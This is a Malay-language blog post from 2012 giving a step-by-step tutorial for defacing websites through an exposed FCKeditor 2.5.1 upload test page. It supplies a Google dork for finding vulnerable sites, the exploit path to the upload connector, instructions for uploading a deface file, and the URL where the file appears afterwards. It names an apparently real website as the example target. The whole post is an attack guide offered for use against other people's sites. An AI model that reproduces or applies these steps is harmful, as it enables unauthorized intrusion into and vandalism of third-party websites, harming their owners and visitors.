HACKING : Deface Guna Cara FCK Editor 2.5.1 ~ Pabila Mambang Berkata-Kata

Assalamualaikum semua, hari ney mambang nak ajar satu lagi cara deface/hack paling senang iaitu menngunakan method FCK Editor

1. Cari target dengan Google Dork:

Code:

inurl:/apps/fckeditor/

2. Pilih salah satu target yg muncul pada google ...
ex:

http://workabout.us/apps/fckeditor/2.5.1/editor/filemanager/connectors/php/

3. Exploitnya ..

Code:

http://target.com/[patch]/apps/fckeditor/2.5.1/editor/filemanager/connectors/uploadtest.html

jadinya :

Code:

http://workabout.us/apps/fckeditor/2.5.1/editor/filemanager/connectors/uploadtest.html

4.Kalo udah masuk ... ganti ASP jadi PHP ..

5.Siapin file deface kita yg berformat *.txt

6. Kembali ke halaman , klik Browse dan cari file deface kita yg udah disiapin tadi ..

7. Terakhir ... klik "Send it to the Server"

============================

Untuk melihat file deface'an kita kasih exploit dibawah ini tepat dibelakang target ..

Code:

/userfiles/16/namafile.txt

jadinya seperti ini :

Code:

http://target.com/userfiles/16/namafile.txt

contoh : http://workabout.us//userfiles/16/mambang.txt :)

mambang copy tuto ney dari sites indo, so, hrap2 ada yg faham la ea

Pabila Mambang Berkata-Kata

September 11, 2012

HACKING : Deface Guna Cara FCK Editor 2.5.1

0 comments:

Post a Comment

Follower

@amirulsyahnaz

busuk.org punya

Pages